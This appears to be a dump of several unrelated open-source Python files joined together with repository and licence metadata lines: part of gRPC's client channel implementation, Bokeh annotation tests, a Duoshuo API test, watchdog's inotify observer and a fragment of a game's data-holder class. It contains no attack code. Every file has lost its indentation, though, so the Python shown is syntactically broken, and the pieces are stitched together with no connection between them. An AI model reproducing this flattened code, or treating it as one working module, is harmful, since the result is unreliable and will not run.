self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata):
return (
(
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata):
return tuple((
operations,
None,
) for operations in _stream_unary_invocation_operationses(metadata))
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def _prepare(self, request, timeout, metadata):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata)
if state is None:
raise rendezvous
else:
call = self._channel.segregated_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials, ((
operations,
None,
),))
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call,
def __call__(self, request, timeout=None, metadata=None, credentials=None):
state, call, = self._blocking(request, timeout, metadata, credentials)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self, request, timeout=None, metadata=None, credentials=None):
state, call, = self._blocking(request, timeout, metadata, credentials)
return _end_unary_response_blocking(state, call, True, None)
def future(self, request, timeout=None, metadata=None, credentials=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata)
if state is None:
raise rendezvous
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def __call__(self, request, timeout=None, metadata=None, credentials=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
if serialized_request is None:
raise rendezvous
else:
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
operationses, event_handler)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def _blocking(self, request_iterator, timeout, metadata, credentials):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
call = self._channel.segregated_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(metadata))
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call,
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(metadata), event_handler)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _StreamStreamMultiCallable(grpc.StreamStreamMultiCallable):
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(metadata, _EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
0, self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials, operationses,
event_handler)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
return _Rendezvous(state, call, self._response_deserializer, deadline)
class _ChannelCallState(object):
def __init__(self, channel):
self.lock = threading.Lock()
self.channel = channel
self.managed_calls = 0
self.threading = False
def reset_postfork_child(self):
self.managed_calls = 0
def _run_channel_spin_thread(state):
def channel_spin():
while True:
cygrpc.block_if_fork_in_progress(state)
event = state.channel.next_call_event()
if event.completion_type == cygrpc.CompletionType.queue_timeout:
continue
call_completed = event.tag(event)
if call_completed:
with state.lock:
state.managed_calls -= 1
if state.managed_calls == 0:
return
channel_spin_thread = cygrpc.ForkManagedThread(target=channel_spin)
channel_spin_thread.setDaemon(True)
channel_spin_thread.start()
def _channel_managed_call_management(state):
# pylint: disable=too-many-arguments
def create(flags, method, host, deadline, metadata, credentials,
operationses, event_handler):
"""Creates a cygrpc.IntegratedCall.
Args:
flags: An integer bitfield of call flags.
method: The RPC method.
host: A host string for the created call.
deadline: A float to be the deadline of the created call or None if
the call is to have an infinite deadline.
metadata: The metadata for the call or None.
credentials: A cygrpc.CallCredentials or None.
operationses: An iterable of iterables of cygrpc.Operations to be
started on the call.
event_handler: A behavior to call to handle the events resultant from
the operations on the call.
Returns:
A cygrpc.IntegratedCall with which to conduct an RPC.
"""
operationses_and_tags = tuple((
operations,
event_handler,
) for operations in operationses)
with state.lock:
call = state.channel.integrated_call(flags, method, host, deadline,
metadata, credentials,
operationses_and_tags)
if state.managed_calls == 0:
state.managed_calls = 1
_run_channel_spin_thread(state)
else:
state.managed_calls += 1
return call
return create
class _ChannelConnectivityState(object):
def __init__(self, channel):
self.lock = threading.RLock()
self.channel = channel
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def reset_postfork_child(self):
self.polling = False
self.connectivity = None
self.try_to_connect = False
self.callbacks_and_connectivities = []
self.delivering = False
def _deliveries(state):
callbacks_needing_update = []
for callback_and_connectivity in state.callbacks_and_connectivities:
callback, callback_connectivity, = callback_and_connectivity
if callback_connectivity is not state.connectivity:
callbacks_needing_update.append(callback)
callback_and_connectivity[1] = state.connectivity
return callbacks_needing_update
def _deliver(state, initial_connectivity, initial_callbacks):
connectivity = initial_connectivity
callbacks = initial_callbacks
while True:
for callback in callbacks:
cygrpc.block_if_fork_in_progress(state)
callable_util.call_logging_exceptions(
callback, _CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE,
connectivity)
with state.lock:
callbacks = _deliveries(state)
if callbacks:
connectivity = state.connectivity
else:
state.delivering = False
return
def _spawn_delivery(state, callbacks):
delivering_thread = cygrpc.ForkManagedThread(
target=_deliver, args=(
state,
state.connectivity,
callbacks,
))
delivering_thread.start()
state.delivering = True
# NOTE(https://github.com/grpc/grpc/issues/3064): We'd rather not poll.
def _poll_connectivity(state, channel, initial_try_to_connect):
try_to_connect = initial_try_to_connect
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
callbacks = tuple(callback
for callback, unused_but_known_to_be_none_connectivity
in state.callbacks_and_connectivities)
for callback_and_connectivity in state.callbacks_and_connectivities:
callback_and_connectivity[1] = state.connectivity
if callbacks:
_spawn_delivery(state, callbacks)
while True:
event = channel.watch_connectivity_state(connectivity,
time.time() + 0.2)
cygrpc.block_if_fork_in_progress(state)
with state.lock:
if not state.callbacks_and_connectivities and not state.try_to_connect:
state.polling = False
state.connectivity = None
break
try_to_connect = state.try_to_connect
state.try_to_connect = False
if event.success or try_to_connect:
connectivity = channel.check_connectivity_state(try_to_connect)
with state.lock:
state.connectivity = (
_common.CYGRPC_CONNECTIVITY_STATE_TO_CHANNEL_CONNECTIVITY[
connectivity])
if not state.delivering:
callbacks = _deliveries(state)
if callbacks:
_spawn_delivery(state, callbacks)
def _moot(state):
with state.lock:
del state.callbacks_and_connectivities[:]
def _subscribe(state, callback, try_to_connect):
with state.lock:
if not state.callbacks_and_connectivities and not state.polling:
polling_thread = cygrpc.ForkManagedThread(
target=_poll_connectivity,
args=(state, state.channel, bool(try_to_connect)))
polling_thread.setDaemon(True)
polling_thread.start()
state.polling = True
state.callbacks_and_connectivities.append([callback, None])
elif not state.delivering and state.connectivity is not None:
_spawn_delivery(state, (callback,))
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append(
[callback, state.connectivity])
else:
state.try_to_connect |= bool(try_to_connect)
state.callbacks_and_connectivities.append([callback, None])
def _unsubscribe(state, callback):
with state.lock:
for index, (subscribed_callback, unused_connectivity) in enumerate(
state.callbacks_and_connectivities):
if callback == subscribed_callback:
state.callbacks_and_connectivities.pop(index)
break
def _options(options):
return list(options) + [
(
cygrpc.ChannelArgKey.primary_user_agent_string,
_USER_AGENT,
),
]
class Channel(grpc.Channel):
"""A cygrpc.Channel-backed implementation of grpc.Channel."""
def __init__(self, target, options, credentials):
"""Constructor.
Args:
target: The target to which to connect.
options: Configuration options for the channel.
credentials: A cygrpc.ChannelCredentials or None.
"""
self._channel = cygrpc.Channel(
_common.encode(target), _options(options), credentials)
self._call_state = _ChannelCallState(self._channel)
self._connectivity_state = _ChannelConnectivityState(self._channel)
cygrpc.fork_register_channel(self)
def subscribe(self, callback, try_to_connect=None):
_subscribe(self._connectivity_state, callback, try_to_connect)
def unsubscribe(self, callback):
_unsubscribe(self._connectivity_state, callback)
def unary_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def unary_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _UnaryStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_unary(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamUnaryMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def stream_stream(self,
method,
request_serializer=None,
response_deserializer=None):
return _StreamStreamMultiCallable(
self._channel, _channel_managed_call_management(self._call_state),
_common.encode(method), request_serializer, response_deserializer)
def _close(self):
self._channel.close(cygrpc.StatusCode.cancelled, 'Channel closed!')
_moot(self._connectivity_state)
def _close_on_fork(self):
self._channel.close_on_fork(cygrpc.StatusCode.cancelled,
'Channel closed due to fork')
_moot(self._connectivity_state)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self._close()
return False
def close(self):
self._close()
def __del__(self):
# TODO(https://github.com/grpc/grpc/issues/12531): Several releases
# after 1.12 (1.16 or thereabouts?) add a "self._channel.close" call
# here (or more likely, call self._close() here). We don't do this today
# because many valid use cases today allow the channel to be deleted
# immediately after stubs are created. After a sufficient period of time
        # has passed for all users to be trusted to hang on to their channels
# for as long as they are in use and to close them after using them,
# then deletion of this grpc._channel.Channel instance can be made to
# effect closure of the underlying cygrpc.Channel instance.
cygrpc.fork_unregister_channel(self)
_moot(self._connectivity_state)
| apache-2.0 |
azjps/bokeh | bokeh/models/tests/test_annotations.py | 3 | 10963 | from __future__ import absolute_import
import mock
from bokeh.core.properties import field, value
from bokeh.core.validation import check_integrity
from bokeh.models.annotations import (
Legend, LegendItem, ColorBar, Arrow, BoxAnnotation, Span, LabelSet, Label, Title
)
from bokeh.models import (
ColumnDataSource, ArrowHead, BasicTicker, BasicTickFormatter, GlyphRenderer
)
from .utils.property_utils import (
FILL, LINE, TEXT, ANGLE, prefix,
check_properties_existence, check_fill_properties,
check_line_properties, check_text_properties
)
def test_Legend():
legend = Legend()
assert legend.plot is None
assert legend.location == 'top_right'
assert legend.label_standoff == 5
assert legend.label_height == 20
assert legend.label_width == 20
assert legend.glyph_height == 20
assert legend.glyph_width == 20
assert legend.padding == 10
assert legend.spacing == 3
assert legend.margin == 10
assert legend.items == []
check_line_properties(legend, "border_", "#e5e5e5", 1.0, 0.5)
check_text_properties(legend, "label_", "10pt", "middle")
check_fill_properties(legend, "background_", "#ffffff", 0.95)
check_properties_existence(legend, [
"plot",
"visible",
"location",
"orientation",
"label_standoff",
"label_height",
"label_width",
"glyph_height",
"glyph_width",
"margin",
"padding",
"spacing",
"items",
"level"],
prefix('label_', TEXT),
prefix('border_', LINE),
prefix('background_', FILL))
def test_ColorBar():
color_bar = ColorBar()
assert color_bar.plot is None
assert color_bar.location == 'top_right'
assert color_bar.orientation == 'vertical'
assert color_bar.height == 'auto'
assert color_bar.width == 'auto'
assert color_bar.scale_alpha == 1.0
assert color_bar.title is None
assert color_bar.title_standoff == 2
assert isinstance(color_bar.ticker, BasicTicker)
assert isinstance(color_bar.formatter, BasicTickFormatter)
assert color_bar.color_mapper is None
assert color_bar.margin == 30
assert color_bar.padding == 10
assert color_bar.label_standoff == 5
assert color_bar.major_tick_in == 5
assert color_bar.major_tick_out == 0
assert color_bar.minor_tick_in == 0
assert color_bar.minor_tick_out == 0
check_text_properties(color_bar, "title_", "10pt", "bottom", "italic")
check_text_properties(color_bar, "major_label_", "8pt", "middle", "normal", "center")
check_line_properties(color_bar, "major_tick_", "#ffffff")
check_line_properties(color_bar, "minor_tick_", None)
check_line_properties(color_bar, "bar_", None)
check_line_properties(color_bar, "border_", None)
check_fill_properties(color_bar, "background_", "#ffffff", 0.95)
check_properties_existence(color_bar, [
"plot",
"level",
"visible",
"location",
"orientation",
"height",
"width",
"scale_alpha",
"title",
"title_standoff",
"ticker",
"formatter",
"color_mapper",
"margin",
"padding",
"label_standoff",
"major_tick_in",
"major_tick_out",
"minor_tick_in",
"minor_tick_out"],
prefix('title_', TEXT),
prefix('major_label_', TEXT),
prefix('major_tick_', LINE),
prefix('minor_tick_', LINE),
prefix('bar_', LINE),
prefix('border_', LINE),
prefix('background_', FILL)
)
def test_Arrow():
arrow = Arrow()
assert arrow.plot is None
assert arrow.x_start is None
assert arrow.y_start is None
assert arrow.start_units == 'data'
assert arrow.start is None
assert arrow.x_end is None
assert arrow.y_end is None
assert arrow.end_units == 'data'
assert isinstance(arrow.end, ArrowHead)
assert arrow.source is None
assert arrow.x_range_name == "default"
assert arrow.y_range_name == "default"
check_line_properties(arrow)
check_properties_existence(arrow, [
"plot",
"level",
"visible",
"x_start",
"y_start",
"start_units",
"start",
"x_end",
"y_end",
"end_units",
"end",
"source",
"x_range_name",
"y_range_name"],
LINE)
def test_BoxAnnotation():
box = BoxAnnotation()
assert box.plot is None
assert box.left is None
assert box.left_units == 'data'
assert box.right is None
assert box.right_units == 'data'
assert box.bottom is None
assert box.bottom_units == 'data'
assert box.top is None
assert box.top_units == 'data'
assert box.x_range_name == 'default'
assert box.y_range_name == 'default'
assert box.level == 'annotation'
check_line_properties(box, "", '#cccccc', 1, 0.3)
check_fill_properties(box, "", "#fff9ba", 0.4)
check_properties_existence(box, [
"render_mode",
"plot",
"visible",
"left",
"left_units",
"right",
"right_units",
"bottom",
"bottom_units",
"top",
"top_units",
"x_range_name",
"y_range_name",
"level",
], LINE, FILL)
def test_Label():
label = Label()
assert label.plot is None
assert label.level == 'annotation'
assert label.x is None
assert label.y is None
assert label.x_units == 'data'
assert label.y_units == 'data'
assert label.text is None
assert label.angle == 0
assert label.angle_units == 'rad'
assert label.x_offset == 0
assert label.y_offset == 0
assert label.render_mode == 'canvas'
assert label.x_range_name == 'default'
assert label.y_range_name == 'default'
check_text_properties(label)
check_fill_properties(label, "background_", None, 1.0)
check_line_properties(label, "border_", None, 1.0, 1.0)
check_properties_existence(label, [
"plot",
"level",
"visible",
"x",
"y",
"x_units",
"y_units",
"text",
"angle",
"angle_units",
"x_offset",
"y_offset",
"render_mode",
"x_range_name",
"y_range_name"],
TEXT,
prefix('border_', LINE),
prefix('background_', FILL))
def test_LabelSet():
label_set = LabelSet()
assert label_set.plot is None
assert label_set.level == 'annotation'
assert label_set.x is None
assert label_set.y is None
assert label_set.x_units == 'data'
assert label_set.y_units == 'data'
assert label_set.text == 'text'
assert label_set.angle == 0
assert label_set.angle_units == 'rad'
assert label_set.x_offset == 0
assert label_set.y_offset == 0
assert label_set.render_mode == 'canvas'
assert label_set.x_range_name == 'default'
assert label_set.y_range_name == 'default'
assert isinstance(label_set.source, ColumnDataSource)
assert label_set.source.data == {}
check_text_properties(label_set)
check_fill_properties(label_set, "background_", None, 1.0)
check_line_properties(label_set, "border_", None, 1.0, 1.0)
check_properties_existence(label_set, [
"plot",
"visible",
"level",
"x",
"y",
"x_units",
"y_units",
"text",
"angle",
"angle_units",
"x_offset",
"y_offset",
"render_mode",
"x_range_name",
"y_range_name",
"source"],
TEXT,
ANGLE,
prefix('border_', LINE),
prefix('background_', FILL))
def test_Span():
line = Span()
assert line.plot is None
assert line.location is None
assert line.location_units == 'data'
assert line.dimension == 'width'
assert line.x_range_name == 'default'
assert line.y_range_name == 'default'
assert line.level == 'annotation'
assert line.render_mode == 'canvas'
check_line_properties(line, "", 'black', 1.0)
check_properties_existence(line, [
"plot",
"visible",
"location",
"location_units",
"dimension",
"x_range_name",
"y_range_name",
"level",
"render_mode"
], LINE)
def test_Title():
title = Title()
assert title.plot is None
assert title.level == 'annotation'
assert title.text is None
assert title.align == 'left'
assert title.offset == 0
assert title.text_font == 'helvetica'
assert title.text_font_size == {'value': '10pt'}
assert title.text_font_style == 'bold'
assert title.text_color == '#444444'
assert title.text_alpha == 1.0
check_fill_properties(title, "background_", None, 1.0)
check_line_properties(title, "border_", None, 1.0, 1.0)
check_properties_existence(title, [
"plot",
"visible",
"level",
"text",
"align",
"offset",
"text_font",
"text_font_size",
"text_font_style",
"text_color",
"text_alpha",
"render_mode"],
prefix('border_', LINE),
prefix('background_', FILL))
def test_can_add_multiple_glyph_renderers_to_legend_item():
legend_item = LegendItem()
gr_1 = GlyphRenderer()
gr_2 = GlyphRenderer()
legend_item.renderers = [gr_1, gr_2]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 0
def test_legend_item_with_field_label_and_different_data_sources_raises_a_validation_error():
legend_item = LegendItem()
gr_1 = GlyphRenderer(data_source=ColumnDataSource(data={'label': [1]}))
gr_2 = GlyphRenderer(data_source=ColumnDataSource(data={'label': [1]}))
legend_item.label = field('label')
legend_item.renderers = [gr_1, gr_2]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 1
def test_legend_item_with_value_label_and_different_data_sources_does_not_raise_a_validation_error():
legend_item = LegendItem()
gr_1 = GlyphRenderer(data_source=ColumnDataSource())
gr_2 = GlyphRenderer(data_source=ColumnDataSource())
legend_item.label = value('label')
legend_item.renderers = [gr_1, gr_2]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 0
def test_legend_item_with_field_label_raises_error_if_field_not_in_cds():
legend_item = LegendItem()
gr_1 = GlyphRenderer(data_source=ColumnDataSource())
legend_item.label = field('label')
legend_item.renderers = [gr_1]
with mock.patch('bokeh.core.validation.check.logger') as mock_logger:
check_integrity([legend_item])
assert mock_logger.error.call_count == 1
| bsd-3-clause |
warriorzcx/duoshuo-python-sdk | duoshuo/tests.py | 5 | 1686 | # -*- coding:utf-8 -*-
#!/usr/bin/env python
"""
Test file for the Duoshuo API. It is a plain Python program and does not use Django's TestCase.
"""
import os
import unittest
try:
import json
_parse_json = lambda s: json.loads(s)
except ImportError:
try:
import simplejson
_parse_json = lambda s: simplejson.loads(s)
except ImportError:
from django.utils import simplejson
_parse_json = lambda s: simplejson.loads(s)
os.sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import duoshuo
import utils
class DuoshuoAPITest(unittest.TestCase):
DUOSHUO_SHORT_NAME = 'official'
DUOSHUO_SECRET = 'a'*32
API = duoshuo.DuoshuoAPI(short_name=DUOSHUO_SHORT_NAME, secret=DUOSHUO_SECRET)
def test_host(self):
api = self.API
host = api.host
self.assertEqual(host, 'api.duoshuo.com')
def test_get_url(self):
redirect_uri = 'example.com'
api = self.API
url = utils.get_url(api, redirect_uri=redirect_uri)
self.assertEqual(url,
'http://%s/oauth2/authorize?client_id=%s&redirect_uri=%s&response_type=code' %
(api.host, self.DUOSHUO_SHORT_NAME, redirect_uri)
)
def test_user_api(self):
api = self.API
response = api.users.profile(user_id=1)
user_id = response['response']['user_id']
self.assertEqual(int(user_id), 1)
    # The tests below require short_name and secret to be set correctly.
# def test_log_api(self):
# api = self.API
# response = api.log.list()
# code = response['code']
# self.assertEqual(int(code), 0)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
yildizberkay/MongoApp | libs/watchdog/observers/inotify.py | 3 | 7033 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011 Yesudeep Mangalapilly <yesudeep@gmail.com>
# Copyright 2012 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:module: watchdog.observers.inotify
:synopsis: ``inotify(7)`` based emitter implementation.
:author: Sebastien Martini <seb@dbzteam.org>
:author: Luke McCarthy <luke@iogopro.co.uk>
:author: yesudeep@google.com (Yesudeep Mangalapilly)
:author: Tim Cuthbertson <tim+github@gfxmonk.net>
:platforms: Linux 2.6.13+.
.. ADMONITION:: About system requirements
Recommended minimum kernel version: 2.6.25.
Quote from the inotify(7) man page:
"Inotify was merged into the 2.6.13 Linux kernel. The required library
interfaces were added to glibc in version 2.4. (IN_DONT_FOLLOW,
IN_MASK_ADD, and IN_ONLYDIR were only added in version 2.5.)"
Therefore, you must ensure the system is running at least these versions
of the appropriate libraries and the kernel.
.. ADMONITION:: About recursiveness, event order, and event coalescing
Quote from the inotify(7) man page:
If successive output inotify events produced on the inotify file
descriptor are identical (same wd, mask, cookie, and name) then they
are coalesced into a single event if the older event has not yet been
read (but see BUGS).
The events returned by reading from an inotify file descriptor form
an ordered queue. Thus, for example, it is guaranteed that when
renaming from one directory to another, events will be produced in
the correct order on the inotify file descriptor.
...
Inotify monitoring of directories is not recursive: to monitor
subdirectories under a directory, additional watches must be created.
This emitter implementation therefore automatically adds watches for
sub-directories if running in recursive mode.
Some extremely useful articles and documentation:
.. _inotify FAQ: http://inotify.aiken.cz/?section=inotify&page=faq&lang=en
.. _intro to inotify: http://www.linuxjournal.com/article/8478
"""
from __future__ import with_statement
from watchdog.utils import platform
if not platform.is_linux():
raise ImportError
import threading
from inotify_c import Inotify
from watchdog.observers.api import (
EventEmitter,
BaseObserver,
DEFAULT_EMITTER_TIMEOUT,
DEFAULT_OBSERVER_TIMEOUT
)
from watchdog.events import (
DirDeletedEvent,
DirModifiedEvent,
DirMovedEvent,
DirCreatedEvent,
FileDeletedEvent,
FileModifiedEvent,
FileMovedEvent,
FileCreatedEvent,
EVENT_TYPE_MODIFIED,
EVENT_TYPE_CREATED,
EVENT_TYPE_DELETED,
EVENT_TYPE_MOVED
)
ACTION_EVENT_MAP = {
(True, EVENT_TYPE_MODIFIED): DirModifiedEvent,
(True, EVENT_TYPE_CREATED): DirCreatedEvent,
(True, EVENT_TYPE_DELETED): DirDeletedEvent,
(True, EVENT_TYPE_MOVED): DirMovedEvent,
(False, EVENT_TYPE_MODIFIED): FileModifiedEvent,
(False, EVENT_TYPE_CREATED): FileCreatedEvent,
(False, EVENT_TYPE_DELETED): FileDeletedEvent,
(False, EVENT_TYPE_MOVED): FileMovedEvent,
}
class InotifyEmitter(EventEmitter):
"""
inotify(7)-based event emitter.
:param event_queue:
The event queue to fill with events.
:param watch:
A watch object representing the directory to monitor.
:type watch:
:class:`watchdog.observers.api.ObservedWatch`
:param timeout:
Read events blocking timeout (in seconds).
:type timeout:
``float``
"""
def __init__(self, event_queue, watch, timeout=DEFAULT_EMITTER_TIMEOUT):
EventEmitter.__init__(self, event_queue, watch, timeout)
self._lock = threading.Lock()
self._inotify = Inotify(watch.path, watch.is_recursive)
def on_thread_stop(self):
self._inotify.close()
def queue_events(self, timeout):
with self._lock:
inotify_events = self._inotify.read_events()
if not any([event.is_moved_from or event.is_moved_to for event in inotify_events]):
self._inotify.clear_move_records()
for event in inotify_events:
if event.is_moved_to:
# TODO: Sometimes this line will bomb even when a previous
# moved_from event with the same cookie has fired. I have
# yet to figure out why this is the case, so we're
# temporarily swallowing the exception and the move event.
                    # This happens only during massively quick file movement,
# for example, when you execute `git gc` in a monitored
# directory.
try:
src_path = self._inotify.source_for_move(event)
to_event = event
dest_path = to_event.src_path
klass = ACTION_EVENT_MAP[(to_event.is_directory, EVENT_TYPE_MOVED)]
event = klass(src_path, dest_path)
self.queue_event(event)
# Generate sub events for the directory if recursive.
if event.is_directory and self.watch.is_recursive:
for sub_event in event.sub_moved_events():
self.queue_event(sub_event)
except KeyError:
pass
elif event.is_attrib:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_MODIFIED)]
self.queue_event(klass(event.src_path))
elif event.is_modify:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_MODIFIED)]
self.queue_event(klass(event.src_path))
elif event.is_delete or event.is_delete_self:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_DELETED)]
self.queue_event(klass(event.src_path))
elif event.is_create:
klass = ACTION_EVENT_MAP[(event.is_directory, EVENT_TYPE_CREATED)]
self.queue_event(klass(event.src_path))
class InotifyObserver(BaseObserver):
"""
Observer thread that schedules watching directories and dispatches
calls to event handlers.
"""
def __init__(self, timeout=DEFAULT_OBSERVER_TIMEOUT):
BaseObserver.__init__(self, emitter_class=InotifyEmitter,
timeout=timeout)
| apache-2.0 |
ospaceteam/outerspace | server/lib/ige/IDataHolder.py | 2 | 1552 | #
# Copyright 2001 - 2016 Ludek Smid [http://www.ospace.net/]
#
# This file is part of Outer Space.
#
# Outer Space is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Outer Space is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Outer Space; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# general holder for ALL data in game
class IDataHolder:
#def __setattr__(self, key, value):
# self.__dict__[key] = value
# self.__dict__['_v_modified'] = 1
#def setModified(self, modified):
# self.__dict__['_v_modified'] = modified
# for debug only
def __repr__(self):
result = '<%s.%s %X ' % (self.__class__.__module__, self.__class__.__name__, id(self))
items = self.__dict__.items()
items.sort()
for key, value in items:
result += '%s=%s, ' % (key, repr(value))
result += '>'
return result
def makeIDataHolder(**kwargs):
